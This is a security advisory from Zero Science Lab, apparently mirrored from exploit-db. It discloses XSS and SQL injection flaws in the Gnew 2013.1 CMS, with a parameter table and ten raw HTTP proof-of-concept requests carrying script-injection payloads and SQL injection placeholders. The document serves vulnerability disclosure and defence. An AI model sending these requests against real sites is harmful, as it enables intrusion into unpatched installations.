Gnew 2013.1 – Multiple Vulnerabilities (1)

  • 作者: LiquidWorm
    日期: 2013-08-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/27522/
  • 
    Gnew v2013.1 Multiple XSS And SQL Injection Vulnerabilities
    
    
    Vendor: Raoul Proença
    Product web page: http://www.gnew.fr
    Affected version: 2013.1
    
    Summary: Gnew is a simple Content Management
    System written with PHP language and using a
    database server (MySQL, PostgreSQL or SQLite)
    for storage.
    
    Desc: Input passed via several parameters is not properly
    sanitised before being returned to the user or used in SQL
    queries. This can be exploited to manipulate SQL queries
    by injecting arbitrary SQL code and HTML/script code in a
    user's browser session in context of an affected site.
    
    
    ============================================================================================
    | PARAM| TYPE|FILE |
    ============================================================================================
    ||
    | gnew_template| XSS | /users/profile.php, /articles/index.php, /admin/polls.php |
    |------------------------------------------------------------------------------------------|
    | category_id| XSS | /news/submit.php|
    |------------------------------------------------------------------------------------------|
    | news_id|XSS, SQLi| /news/send.php, /comments/add.php |
    |------------------------------------------------------------------------------------------|
    | post_subject | XSS | /posts/edit.php |
    |------------------------------------------------------------------------------------------|
    | thread_id|XSS, SQLi| /posts/edit.php |
    |------------------------------------------------------------------------------------------|
    | user_email | SQLi| /users/register.php, /users/password.php|
    ||
    ============================================================================================
    
    
    
    Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
     Apache 2.4.2 (Win32)
     PHP 5.4.7
     MySQL 5.5.25a
    
    
    Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
    @zeroscience
    
    
    
    Advisory ID: ZSL-2013-5153
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5153.php
    
    
    
    23.07.2013
    
    ---
    
    
    #1 [xss]
    
    GET /gnew/users/profile.php HTTP/1.1
    Host: localhost
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/gnew/admin/index.php
    Cookie: PHPSESSID=8nta354i78d5att3l2gkh9g573; gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0; gnew_language=english; gnew_template=clean"><script>alert(1)</script>
    Connection: keep-alive
    
    
    #2 [xss]
    
    POST /gnew/news/submit.php HTTP/1.1
    Content-Length: 112
    Content-Type: application/x-www-form-urlencoded
    Referer: http://localhost:80/gnew/
    Host: localhost
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    
    category_id=1"><script>alert(2);</script>&news_source=1&news_subject=1&news_text=1&preview=Preview&submit=Submit
    
    
    #3 [xss]
    
    POST /gnew/news/send.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Referer: http://localhost:80/gnew/
    Host: localhost
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    
    friend_email=lab@zeroscience.mk&html_email=1&news_id=572"><script>alert(3);</script>&send=Send&user_email=root@att.com&user_name=admin
    
    
    #4 [xss]
    
    POST /gnew/comments/add.php HTTP/1.1
    Content-Length: 96
    Content-Type: application/x-www-form-urlencoded
    Referer: http://localhost:80/gnew/
    Host: localhost
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    
    add=Add&comment_subject=1&comment_text=1&news_id=574"><script>alert(4);</script>&preview=Preview
    
    
    #5 [sqli]
    
    POST /gnew/news/send.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Referer: http://localhost:80/gnew/
    Host: localhost
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    
    friend_email=lab@zeroscience.mk&html_email=1&news_id=572{SQL Injection}&send=Send&user_email=root@att.com&user_name=admin
    
    
    #6 [xss]
    
    POST /gnew/posts/edit.php HTTP/1.1
    Content-Length: 153
    Content-Type: application/x-www-form-urlencoded
    Referer: http://localhost:80/gnew/
    Host: localhost
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    
    category_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=zsl"><script>alert(5);</script>&post_text=test&preview_edited=Preview&thread_id=6
    
    
    #7 [xss]
    
    POST /gnew/posts/edit.php HTTP/1.1
    Content-Length: 184
    Content-Type: application/x-www-form-urlencoded
    Referer: http://localhost:80/gnew/
    Host: localhost
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    
    category_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=test&post_text=test&preview_edited=Preview&thread_id=6"><script>alert(6);</script>
    
    
    #8 [sqli]
    
    POST /gnew/posts/edit.php HTTP/1.1
    Host: localhost
    Content-Length: 127
    Content-Type: application/x-www-form-urlencoded
    Referer: http://localhost:80/gnew/
    Host: localhost
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    
    category_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=test&post_text=test&preview_edited=Preview&thread_id=6{SQL Injection}
    
    
    #9 [sqli]
    
    POST /gnew/users/password.php HTTP/1.1
    Host: localhost
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/gnew/users/password.php
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 40
    
    user_name=test&user_email={SQL Injection}&password=Send
    
    
    #10 [sqli]
    
    POST /gnew/users/register.php HTTP/1.1
    Host: localhost
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/gnew/users/password.php
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 40
    
    user_name=test&user_email={SQL Injection}&password=Send